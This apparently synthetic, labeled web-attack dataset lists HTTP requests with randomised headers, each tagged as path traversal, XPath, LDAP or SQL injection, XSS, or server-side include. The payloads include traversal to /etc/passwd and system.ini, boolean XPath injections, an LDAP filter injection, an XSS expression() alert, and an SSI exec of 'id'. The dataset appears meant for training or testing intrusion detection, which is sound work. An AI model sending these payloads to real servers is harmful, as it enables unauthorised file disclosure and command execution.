PUT /edTbdLe51PzJ0/do7ali7tsonehuaeer/v1Fp/omtehnidrtNs/ew/bW@ny/eohjneedgyoneytd/W1Pm3.RobjectW414/.yC_T/glrtEsEia.nsf? HTTP/1.1
Content-Length: 289
Content-Language: gnnldu,nlEx,e
Content-Encoding: gzip
Content-Location: http://eDrhwivd.cz/8whs/Nucete/ilrll2rL/odicsIfn.sh
Content-MD5: NXlkaHNsc0RscjJvY21ldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Nov 06 16:34:15 CET
Last-Modified: Mon, 14 Sep 09 13:16:10 UTC
Host: 201.153.243.152
Connection: w1t1e
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress, gzip;q=0.2, deflate, deflate
Accept-Language: me-osRael;q=0.6, enrHqie-yo;q=0.0, l2lt-5zzeAb, ttdnla-hihzersO;q=0.1
Cache-Control: max-age=143
Client-ip: 106.66.65.58
Cookie: LUboot.iniaOEVy=24472;168sqtrrtolps=erR
Cookie2: $Version="891"
Date: Sat, 04 Feb 06 23:56:25 GMT
ETag: W/"XioESPEeFrnADNJ"
Expect: Zgse=teneo;otninw=mnsa
From: ddsory@ail3hIue.st
If-Modified-Since: Sun, 09 Jul 06 11:55:54 CET
If-Unmodified-Since: Tue, 13 Jan 09 04:30:50 CET
If-Match: *
If-None-Match: "KEvsj_Yu0hTdM9t"
If-Range: *
Max-Forwards: 2670
MIME-Version: 8.9
Pragma: ena='amtet'
Authorization: Basic dnVhN3M6bnByMmE=
Referer: http://www.pmonrt.fr/enotShea/hafn/A2rib/bto0/jctie.mpeg
TE: trailers
Trailer: If-None-Match
User-Agent: eOkUDkJF_ http://www.easkat1.de
UA-CPU: 68000
UA-Disp: 740,794,8
Via: HTTP/2.0 40.243.44.154, 6.4 www.tnxyl.shtml
Transfer-Encoding: deflate
Upgrade: hs1gw/0.3, rdt/3.0
Warning: 729 81.169.14.55 "k7tiinwireni" "Mon, 24 Dec 07 19:28:46 GMT"
X-Forwarded-For: 182.111.185.137
----: ---------------------------------

rIidLB5Fwget6Gp=7tlpte7oasi&rdailepfAhNdah=;n1&3iarE5a=94280&frunhgsiehmesrn=3ats&ndtnRsht5hb=3611060361&nsrlwstHe=jnN2flb&ndszTsdle5neu=smee'  or 1<   di1hD/ao/foa/child::text()[position()=00]  or  'da5hc'=    '&a7gtawndbtsxsw=cix&aefdWpctd=il3rVm3hh

End - Id: 35529
Start - Id: 46183
class: PathTransversal
GET /c6/jaaeldn2qaoavmvrnh/50wN4lmY63replacerHgI/LMhnMh_ev/EtA1EpP/xD7yeT7vWGE/wvsodT.asmx?n4n6esRtm05=nV5_CpG82yp&tHo=oerDqthitjwpeeih&binXn-zOK2=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&amcxugeof=tLVLsYyQoRcc&tnenhcllsleeVn=2457166&oiggndeoaa=7+ohth%7Efttejdyd&ehnfiiateoin6k=T&VbDVi8DP=nA6obeioawtHcir1 HTTP/1.1
Host: www.lH5tatcTy.uk
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-japanese;q=0.4, x-mac-hebrew, iso-8859-6;q=0.5
Accept-Encoding: identity;q=0.7, compress, identity
Accept-Language: i9sn-ls91vY;q=0.0
Cache-Control: no-store
Client-ip: 68.94.47.234
Cookie: lrfhsueeonsecbi=35;pea3esOf=31068;wb@YFossd=1slstdinmnddda;t2aehdl=10729279;4deuFEB=e;ar3
Cookie2: $Version="82"
Date: Tue, 12 Jan 10 09:14:03 CET
ETag: W/"zHp6z1-Anyy.MLyB2IMg"
Expect: 100-continue
From: duvqw@ecyw.st
If-Modified-Since: Thu, 26 Feb 04 13:09:32 UTC
If-Unmodified-Since: Fri, 10 Nov 06 17:51:23 CET
If-Match: "gBdVIw-rg8PGms5in1U"
If-None-Match: *
If-Range: Mon, 02 Mar 09 02:41:46 CET
Max-Forwards: 1313
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: 9esi xlsrt=e623
Authorization: Digest response="a9e5F10D9dffdBcbdAD1c7071a9ff3dA"
Range: -423
Referer: http://www.uoe2jarc.be/iebe.avi
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.5 (X11; U; Linux i586 4.5; ja-iA; rv:9.8.7) Gecko/93500003
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 185.106.63.180
Transfer-Encoding: gzip
Upgrade: amiap/9.1
Warning: 655 www.Rammo7w.css "tlMp6c3o" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 726425305540692
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46183
Start - Id: 49880
class: XPathInjection
GET /oMttej/d1.dll?eltriykn5v=98&aotade2acw3opnt=eie4tn&pyo5r7tcnqem=8dufhn&1ZcIhoD=%3F+http&ouno=43&8LBa@Qgh=tnhao%2Frg6fof%2Fi%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D7%5D++++%7C++Sot4%2Fgrf%2Fhndik%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D679%5D++++or+++%27ttiP6c0%27++++%3D+%27&Ae0d0hEAtyi=rdz-Raccess_logiornE HTTP/1.0
Host: www.evrveya.uk
Connection: keep-alive
Accept: text/*;q=0.5
Accept-Charset: hz-gb-2312, shift_jis, iso-8859-4
Accept-Encoding: *;q=0.4
Accept-Language: 0zhh-kj, lqirc3-etUtt3;q=0.6, sh-oe;q=0.4, ztam-bhotjvg;q=0.9
Cache-Control: max-age=4201
Client-ip: 161.161.216.27
Cookie: abthytxOt=6;ti1t8rnvtzaz=arftThe1ts;uaegd=uaei;ndeqdGntxqe=9rha0nnipAsl;8efrGag=dedhrrtjgeiT4E5nm
Cookie2: $Version="5"
Date: Sun, 03 Oct 04 23:33:56 CET
ETag: W/"hH71xME7IfcK@fLcorf4"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sun, 24 Jan 10 22:11:14 CET
If-Unmodified-Since: Fri, 25 May 07 13:22:22 UTC
If-Match: *
If-None-Match: "uZlf6YTitnEeNbpcG3e"
If-Range: Sun, 06 Aug 06 02:37:20 CET
Max-Forwards: 8
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: http://snhr.com/Aogujt/ald5.tar.gz
TE: trailers,trailers,deflate;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/6.3 (X11; U; Solaris 4.9; li-te; rv:9.4.8) Gecko/30374966
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 005x724
Via: 8.7 179.205.81.28
Transfer-Encoding: compress
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49880
Start - Id: 38946
class: LdapInjection
GET /2QRaInp3vvGxoJVi8r@6/dxqhcHHoeLbJpbi@pjp/m_lhBSn4l/wk3sWJ/weo88iiyna/TconnectQ.shtml?agatcb=cie%29%28%7C+%28stb%3D*%29&s7amnenecixaa4n=mYh9Z&wcidD=ryyt%5DaineCoE&chyfninpAusgt=8487391 HTTP/1.0
Host: 192.166.0.86
Connection: leotrdee
Accept: video/quicktime
Accept-Charset: iso-8859-9, isiri-3342;q=0.7
Accept-Encoding: gzip, deflate;q=0.3
Accept-Language: nve-e, a8Abrrea-Eai, Dpnteoos-Ismet3p;q=0.7
Cache-Control: no-cache
Client-ip: 222.159.26.220
Cookie: te=h_Et4Q5bLt3;sfet=ohps7r/eexec;bhsne=49303
Cookie2: $Version="84"
Date: Mon, 08 Feb 10 02:16:13 GMT
ETag: "WgOE-@mxQ2kn4lL8xC_"
Expect: leah=Oactsgd
From: merdf@ssdhtag.cz
If-Modified-Since: Thu, 13 Jan 05 12:06:02 GMT
If-Unmodified-Since: Fri, 23 Dec 05 24:48:45 GMT
If-Match: *
If-None-Match: "U-KhaIByMiZf-ge"
If-Range: Tue, 20 Jan 04 04:59:28 CET
Max-Forwards: 2
MIME-Version: 8.6
Pragma: 1ymeE3bt=bngaA
Proxy-Authorization: Basic cncwbnU6dHRpSGFhd28=
Authorization: Basic ZTFhbHI6c2FoMmlzdA==
Range: 19115-,-68,486-99
Referer: http://www.ssjn3n.com/urike/sios/fnmio/fr4Mxrmo.png
TE: trailers,chunked,gzip;q=0.1
Trailer: From
User-Agent: Mozilla/0.6 (Machintosh; U; PPC Mac OS X 8.3; pe-ee; rv:6.7.4) Gecko/47258310
UA-CPU: 68000
UA-Disp: 4990,2701,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: omnR/7.2 www.1faed.png, ggaos/6.8 65.244.238.102, 3.9 www.coofel.html
Transfer-Encoding: compress
Upgrade: shejr/6.7, moOdhj/9.9, yir/7.8
Warning: 766 39.53.21.205 "etnwdeh" "Thu, 10 Nov 05 22:23:35 UTC"
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38946
Start - Id: 49343
class: XPathInjection
GET /b@KiZlgfvR-NVS/zbesrnhlLAe4devt0f3h/douiob.js?V1@JolikeUf=65710++or+++rftoo%2F8%2Fdtrtl%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D39%5D++or++++1%3D&eag=nAsstnEcoreiw&igncccoiy8EM=3nis&dayvdp0ehge=xV8vAif&h6eofedeeeauuh=9qxh9&cCd3jneq=nWn%3ETqetMetlewtN&oqrsrn5eai=8553&bandwVuuservicesB=8005595&rBvn4hv=ret&EEE2=+ucmdttfna&rc0tspvw8=eeiyva%3Bm+1pciframewt&fTleceedrsgde=Mezeapc&CsgAotn3pUq=5447&d7eoiua0eKsfat=sntrettnAe0espl6&reat39iEeylEtum=447773818 HTTP/1.1
Host: 42.199.211.123
Connection: keep-alive
Accept: image/jpeg, application/x-tar;q=0.7, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 179.131.115.59
Cookie: 7gos=oSBJVZ30_;oim4oetaoosT=mocha;eLbeIa=eee
Cookie2: $Version="415"
Date: Sat, 19 Nov 05 11:43:45 UTC
ETag: "iBFJ9mYzhquyr_gUZQz"
Expect: oitbte
From: ilheiOI@yzloo.de
If-Modified-Since: Sat, 19 Jul 08 16:53:04 CET
If-Unmodified-Since: Sun, 25 Sep 05 05:58:13 CET
If-Match: "pZkrUhx7ku9-5baPA3"
If-None-Match: "Exsdm9BaM21BIRxaF6"
If-Range: Fri, 14 Sep 07 11:34:59 UTC
Max-Forwards: 0
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Basic MmkxM0M6MXJiZQ==
Range: 39-,253249-,539-99
Referer: http://oeobher.ch/nSersh/Tsetwde/id5da/cttotom/etin.png
TE: deflate,gzip
Trailer: From
User-Agent: Mozilla/5.2 (compatible; Konqueror/2.9; Win98; eero7m)
UA-CPU: StrongARM
UA-Disp: 396,9946,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x2070
Via: 1.4 120.26.28.223
Transfer-Encoding: deflate
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 257 184.190.147.157 "nuwa" "Wed, 25 Aug 04 17:11:36 GMT"
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 27114318414424
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49343
Start - Id: 49170
class: XPathInjection
GET /eh8h_v.y5e/tliMaurzb/wp-MtGyp/gOzFkQklBKeTUpEjg6C/xgvnPbVQsVJG/dAH_yDJ-x.html?neSouAnmdeusaen=%3A+h6Yf&nttjsoerlhgeo=3Hee3r046&yUMpubt79d=9083&ixei=rlinsertmd6evalx%28d&idhi=0e-&TuNDro4wp1eji=%5Dr&rne7tsasbedoLrb=uIs&h3Evfsn5ltergn=geamanagqMe&sfACeeweEanolap=iconnectnusrtniPshutdownrcpe&Dbotofhbo=tugt%27+++++or+++onkeei%2FttpKb%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D748%5D+or++%27s4h%27%3D+%27 HTTP/1.0
Host: www.arrn.gov
Connection: ci7aeeo
Accept: */*;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: j-vgielmd;q=0.3
Cache-Control: o=s
Client-ip: 38.175.250.11
Cookie: mfihztew9l0seIj=9
Cookie2: $Version="2"
Date: Sat, 20 Oct 07 24:55:22 CET
ETag: "mOIFkg9nVCC_XPd"
Expect: 100-continue
From: sbgdd@uletat2q.net
If-Modified-Since: Mon, 09 Feb 09 05:34:14 CET
If-Unmodified-Since: Sun, 16 Nov 08 08:04:31 GMT
If-Match: *
If-None-Match: "st4x0Mea.kYgi2.46"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Digest uri=/ttoaoeel/1sOh/viue/awdeeuSs.wav
Range: 96-,87333-9
Referer: http://www.oemrRih.be/eseacion/sxi2dOA/taouu/rsSoEha/itescYmo.wmn
TE: trailers,trailers,chunked
Trailer: TE
User-Agent: mhLOzh1uX6baecsnPin
UA-CPU: StrongARM
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 290x3654
Via: 6.0 142.227.212.105, 8.2 163.93.226.180, HTTP/2.0 www.gtftHloh.gif
Transfer-Encoding: gzip
Upgrade: taetg/0.8, tzsep/3.3
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 887943993
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49170
Start - Id: 37932
class: LdapInjection
GET /IDR6CeGy0andUXK@/nC3ZHObLq9/sHIJF9/Pr0ghtihnohn1teftsi/Z8PelolinCEDj/s8sf2iz3dmpQKTEOgIV.bin?e3i=2ne6+8t&aayihvpnnnv=xeatoaJfeoTEEaa99&G6QKqO=%3Dmled&mur2=s%26+d&Tcat8-tc8-6=9620&ratynn9vy=iote&Nnbon=d%2F%26djytIaSot&jhhaMsjzhrhtd=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eiednNsshzgaan=position&euhesTzOeant=5829708&EH=o%3Ae0eiboot.ini+eein9ie%5C%29 HTTP/1.1
Host: www.dGATr5.st
Connection: 11qideh
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-89jttiOc;q=0.6, DhsraExu-og;q=0.5
Cache-Control: max-age=42
Client-ip: 76.222.226.172
Cookie: aprheeebedke=0;aiulaifs7uco=onxaTqtyiHt2atSud;otqhlN=7266;hnnxmpzne=ersnhheMe;tihotieab5Tu=7329
Cookie2: $Version="6"
Date: Sat, 02 Oct 04 20:46:10 CET
ETag: W/"JIaiNtCmlEs.7pkMV8yn"
Expect: dtawu=4tsB
From: heal@ehrTn.gov
If-Modified-Since: Thu, 22 Jun 06 19:05:47 UTC
If-Unmodified-Since: Tue, 28 Aug 07 18:17:04 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 01 Apr 08 03:09:34 GMT
Max-Forwards: 9
MIME-Version: 8.6
Pragma: 7mHNHa=ee3eiba
Proxy-Authorization: skno0 leiotlhl=mslla
Authorization: ethp 2hhte=rcbs
Range: 92-
Referer: http://yenutep.de/5rou3sk2/eiaxlmfd.mspx
TE: chunked,trailers
Trailer: Upgrade
User-Agent: rwsyaoql
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 649x451
Via: 2.9 160.63.123.231
Transfer-Encoding: compress
Upgrade: udtE/5.5, hiteNc/1.2, tffIc/7.5, nhr/8.0, ptIvu/0.9
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37932
Start - Id: 44837
class: PathTransversal
GET /K9Tl1GzuZkTE5P/wOn/nh3oqpa/sm8eX2/HN4FGnQa6QqaN.mdb?TliEc4vd=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500 HTTP/1.0
Host: www.lodedorry.gov:80
Connection: keep-alive
Accept: audio/x-wav, text/xml, video/*;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 238.82.144.7
Cookie: id=0t?aSy2akv3m;Efhnnc3hhe=59921497;Grtgtarj=nyoolocation;es=okG;aEszb=l:httve
Cookie2: $Version="393"
Date: Mon, 14 Jun 04 18:55:16 CET
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Sun, 28 Nov 04 03:59:32 UTC
If-Unmodified-Since: Sat, 25 Nov 06 19:15:51 UTC
If-Match: "_F5cy_Ape-PYI7E2EApc"
If-None-Match: "1PzXibVCPnYO-bO"
If-Range: Sun, 17 Apr 05 14:17:59 CET
Max-Forwards: 1
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: NTLM cnRhZ25sYWlscmNrMzQweWRwdG9jYW9zZWx0cGVubXZp
Authorization: Basic aGVlcjdyOm9rd3Nz
Range: 4-,8-56742
Referer: http://www.e8sn.uk/vcek7/8msc.bin
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/4.6 (Machintosh; U; PPC 7.8; Gt-be; rv:5.4.7) Gecko/61700641
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 035x248
Via: HTTP/7.6 www.etLn.shtml, FTP/7.5 147.167.167.51
Transfer-Encoding: identity
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 479 www.eao96f.png "ldeigihLwAo78oeint" "Mon, 21 Dec 09 20:16:29 UTC"
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44837
Start - Id: 45321
class: PathTransversal
GET /T0ehEixOoYHrNhtl/nxatoacp9Dg/obusufwarosdtmils/sWzut25Vu/nN-9yY1SseDwyIZeY/ipt585FA2mdgd/w9T-qKPecWY1Exj@MlH/oogeiptbwhae/tKz/i5TeS7l6B7nMhZ.d6Xo/sPvSIFt2r644/Shr7a4e9l.bin? HTTP/1.0
Host: 221.156.200.9
Connection: close
Accept: text/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 2-8l4h, innm-t1c, Be-qy4e1N8r, mcSsafo-rtUg
Cache-Control: only-if-cached
Client-ip: 204.225.205.122
Cookie: 9sr=..\..\..\..\WINNT\system.ini;eeuqsem=67;rbyevcrymEnhlep=2;UsamLS=sO
Cookie2: $Version="6"
Date: Mon, 31 Jan 05 22:29:36 CET
If-Modified-Since: Sun, 21 Aug 05 17:32:30 CET
If-Unmodified-Since: Mon, 09 May 05 08:42:02 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 12 May 06 10:52:30 GMT
Pragma: no-cache
Proxy-Authorization: Basic ckpvbzM6bWlpdDBlYU4=
Authorization: Digest response="f4bF60Aa1266995B1aCc7eEdbadE92C4"
Referer: http://www.k4Wi7rtt.uk/Rnlfhs/UirHkneg/tor9se.swf
TE: chunked;q=0.2,trailers
User-Agent: Mozilla/2.3 (compatible; Konqueror/3.5; Unix; 6snuesijsY; cznoie8l; eigeade)
Transfer-Encoding: compress

null

End - Id: 45321
Start - Id: 46233
class: PathTransversal
GET /nkxqzHqx/6S0jiQ8@kl/2reAdctNYN/a3E80/lxcbiiGC/eEZvN_MNgFMqix/p4cdnuu3Ucod/ih0N.jsp?kehrL0UqCA=en%3A5&nvtloin=2o3ut&5n6roR=6&tr3yraptcJE=dR-9fdM4o8s&ortelaa9wdeP4e=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.1
Host: www.twriruliet.gov
Connection: agent
Accept: audio/*, audio/*;q=0.6
Accept-Charset: x-mac-arabic, iso-8859-9;q=0.8, koi8;q=0.2
Accept-Encoding: identity, compress, identity, identity;q=0.6
Accept-Language: *;q=0.9
Cache-Control: min-fresh=0983
Client-ip: 239.42.171.202
Cookie: hta=792;9pr8ctgds3eh=sWu&m(;nx=qSev >klc
Cookie2: $Version="8"
Date: Mon, 03 Mar 08 01:56:04 GMT
ETag: W/"ST3jGS5xrQZ2inWOP6F"
Expect: 100-continue
From: eftra@neleobejy.com
If-Modified-Since: Wed, 21 May 08 17:48:31 UTC
If-Unmodified-Since: Tue, 02 Nov 04 09:51:03 CET
If-Match: *
If-None-Match: "sfVc1tpHw8kkgLGk"
If-Range: "obeLxAKivl4.Yg2Y"
Max-Forwards: 9
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: sczoan Qaahstc=tldthrl
Authorization: NTLM aWlvNG5lYXJzMmlvZGl0bmNsdXRhbWFIdTFpYWlwYW1vZWJlYWRuMG5kczg=
Range: 173-
Referer: http://www.0hzalNr.fr/tmhIa/wbnt/otm4o/DRsy/Vu9rit.tar
TE: chunked,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/5.0 (Machintosh; U; PPC Mac OS X 3.1; aI-nd; rv:9.9.3) Gecko/19459157
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 7340x8822
Via: 5.4 www.pncnuio7.css, HTTP/2.0 www.t9iihm.html
Transfer-Encoding: o5tst; thmi0=tvxnoz
Upgrade: Sdb/4.1
Warning: 235 www.tpm0.css "YcngsoigutaasdemifSa" 
X-Forwarded-For: 29.166.94.55
X-Serial-Number: 79986231728889
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46233
Start - Id: 41879
class: SqlInjection
GET /bITinsertYOqHdall0wL.g/craee5wledfzhiwo/iacyntaocTrodui/pbtkNa/dc0yxZm/rj9hpdwrfgez/DdTUOVo/tq.html?9shrkreytsrma=%27select+++++customer_phone+++%27%7C%7C%27from++customers+%27%7C%7C%27where++++customer_surname%3D%27%27%27%7C%7C++++lv_surname%7C%7C%27%27%27++and++++customer_type%3D1%27%3B&oestnrsjmev=63s0a HTTP/1.0
Host: 32.239.56.140
Connection: imvSoaI
Accept: image/jpeg;q=0.2, text/plain, application/postscript
Accept-Charset: x-mac-cyrillic;q=0.6, iso-8859-7;q=0.0
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: ft4a='owsPaS'
Client-ip: 203.18.145.66
Cookie: rsyoasinsmnaa4=b
Cookie2: $Version="01"
Date: Sun, 05 Jul 09 08:53:23 GMT
ETag: W/"yKcgygKPCwRoQ3lbkIJ"
Expect: ul4i0tva
From: uims2c@rtXh1sbi2a.cz
If-Modified-Since: Tue, 31 May 05 05:38:45 GMT
If-Unmodified-Since: Fri, 23 Sep 05 05:05:41 UTC
If-Match: "RZeWUmEl@SmE-rH-sp"
If-None-Match: *
If-Range: Mon, 01 Nov 04 08:58:29 CET
Max-Forwards: 4366
MIME-Version: 0.4
Pragma: Ec1=n
Proxy-Authorization: NTLM aG91bjd0ZWhzYWRkcmh3ZW95YzA2YWNocnJldHFhbHNub3VhYXdlZGl0M2xyOTE=
Authorization: Basic b2VlZ3c6bmFuSGF6
Range: 2764-93323,17883-91
Referer: /Zrd0q.swf
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: 3B4t3J1 http://www.tofpof.net
UA-CPU: StrongARM
UA-Disp: 9347,2639,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 044x365
Via: 6.0 76.219.28.188, utq/8.6 www.ehjoke4.png:7375
Transfer-Encoding: deflate
Upgrade: 4sh/4.2, Rdhtih/8.1
Warning: 984 www.itta9e.css:2 "tnFBt1atci4lailr0ph" 
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 3139045
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41879
Start - Id: 47439
class: XSS
GET /uA5x7M4REc7QDcgBEKhi/PFIMW.css?ztUiui=hd+s&svNt=2&wOepggu=cMXRsRdJey&ndiOto0tac=sa5tadgiyjnn&nleem=isoeicetsoib&rLmpOidn=laevir++++style%3Dleft%3Aexpression%28alert+++%28p.i3to%29%29&dtsmyaduno=8392480277&usn0oujDfd=passthrutxrpdehesYpassthrumsu HTTP/1.0
Host: www.dtNoleehzt.org
Connection: teuo
Accept: */*
Accept-Charset: gb2312;q=0.6, utf-7, ks_c_5601-1987, x-mac-icelandic;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 33.233.160.141
Cookie: NoAaauraecjS=5home;nang=849;tandDoa=cFaa;6Qtwgrenvr4rlyt=qd iionreaesbgsoundtiglrlocation;toozsaao=8414179
Cookie2: $Version="05"
Date: Fri, 23 Feb 07 17:13:00 GMT
ETag: W/"USbOQLZFotY12CP"
Expect: Bn3ehR
From: desfe5rt@owenslwi5e.org
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "cr9wjUcukfFuJApk9"
If-None-Match: *
If-Range: Fri, 19 Jun 09 18:29:02 UTC
Max-Forwards: 12
MIME-Version: 1.7
Pragma: sEbt='fq'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM SGVlaWl0eXR0aGlhMHBvZTVDYW1vb3VyY2FwNTZ0dE9Jc3ljbHp0cm55aWl5YWVz
Range: 13744-31405
Referer: http://www.hspndpwt.st/dn3shm.asmx
TE: chunked;q=0.3,trailers,trailers
Trailer: If-Range
User-Agent: 8dn24iteoI8
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 644x740
Via: 3.6 www.5orevyr.png:07, 4.9 www.urHyuh.htm, 5.6 117.197.231.210
Transfer-Encoding: Arhg9
Upgrade: ipodo/1.3, Abos/3.0, rwucs/0.4, xtsw4a/6.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 217.98.75.84
X-Serial-Number: 31680375275
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47439
Start - Id: 39870
class: SSI
GET /PMhaving_.4zlibdte/1fTjhttptbodykZoptYq/bf2EEyY/iBmqnomhhaflina/okU32vscriptlikek--.4/mvReljhtdsd.dll?aee2oHhetty=dRi392aTE&YlogK3MAqJLp90=362566033&bsh=ntabkegtutt&noamdrosMe=o4ucse5GsE&r9lebk=glbdpsDhywserlusi HTTP/1.1
Host: 172.72.245.185:80
Connection: close
Accept: application/*;q=0.7
Accept-Charset: iso-10646-ucs-2;q=0.9
Accept-Encoding: <!   #<!--    #exec   cmd="id"-->
Accept-Language: e-oehvr
Cache-Control: no-cache
Client-ip: 239.141.7.50
Cookie: ahi2l6089=oN cH ldtn+Rmu;adminIxvJHXK=ezP;ehirn=73
Cookie2: $Version="32"
Date: Wed, 25 Jan 06 01:22:29 CET
ETag: "YiIMsANeiSV3D4fxFx8"
Expect: 100-continue
From: wthnun@ytfeopzfh.com
If-Modified-Since: Mon, 20 Apr 09 09:07:05 UTC
If-Unmodified-Since: Sat, 12 Feb 05 12:15:01 CET
If-Match: *
If-None-Match: "agMIhXvnB.oF1XyzW"
If-Range: *
Max-Forwards: 5
Pragma: no-cache
Proxy-Authorization: cits d39em=teheerc6
Authorization: NTLM ZXR3aXV1ZEplaXl1ZGRldWFhdGFJM3N0bml0dG5zdm5kZWd0N2xnZWRl
Range: -18262
Referer: http://uhemddtr.cz/t4oo0qrE/ubUmcb.swf
TE: deflate;q=0.3,deflate;q=0.8
Trailer: Trailer
User-Agent: sr4o1zod (fUvwzs; alkb1bt; oIFHOp5Z; ono2yT7-w)
UA-Disp: 4055,501,16
UA-OS: WinNT
UA-Color: color32
Via: 4.4 www.a6rhsol.htm:0
Transfer-Encoding: deflate
Upgrade: ndilra/6.2, enb/6.3
Warning: 953 www.1baesur.htm "e1bsRdaewlhUtiaO" "Wed, 15 Jul 09 03:30:45 GMT"
X-Forwarded-For: 37.56.79.152
X-Serial-Number: 43920543288578219510
----: --------------------------------------------------

null

End - Id: 39870
Start - Id: 49871
class: XPathInjection
